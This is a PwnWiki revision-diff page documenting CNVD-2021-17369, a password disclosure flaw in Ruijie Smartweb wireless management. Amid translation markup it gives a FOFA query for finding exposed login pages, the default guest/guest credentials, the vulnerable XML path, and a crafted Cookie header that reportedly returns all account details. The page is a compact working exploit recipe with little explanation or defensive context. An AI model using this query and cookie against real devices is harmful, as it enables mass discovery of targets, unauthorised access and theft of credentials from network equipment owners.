Difference between revisions of "CNVD-2021-17369 銳捷Smartweb管理系統 密碼信息洩露漏洞"
From PwnWiki
(Created page with "<languages /> ==FOFA== <pre> title="无线smartWeb--登录页面" </pre> <translate> ==默認guest密碼== </translate> <pre> guest/guest </pre> <translate> ==漏洞位...") |
(Marked this version for translation) |
||
| Line 7: | Line 7: | ||
<translate> | <translate> | ||
| − | ==默認guest密碼== | + | ==默認guest密碼== <!--T:1--> |
</translate> | </translate> | ||
| Line 16: | Line 16: | ||
<translate> | <translate> | ||
| − | ==漏洞位置== | + | ==漏洞位置== <!--T:2--> |
</translate> | </translate> | ||
| Line 25: | Line 25: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:3--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
Cookice添加以下內容 | Cookice添加以下內容 | ||
</translate> | </translate> | ||
| Line 37: | Line 38: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
可以獲取所有賬戶信息 | 可以獲取所有賬戶信息 | ||
</translate> | </translate> | ||
| Line 42: | Line 44: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:6--> |
</translate> | </translate> | ||
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ | https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ | ||
Revision as of 14:40, 4 April 2021
FOFA
title="无线smartWeb--登录页面"
默認guest密碼
guest/guest
漏洞位置
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
漏洞利用
Cookice添加以下內容
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
可以獲取所有賬戶信息
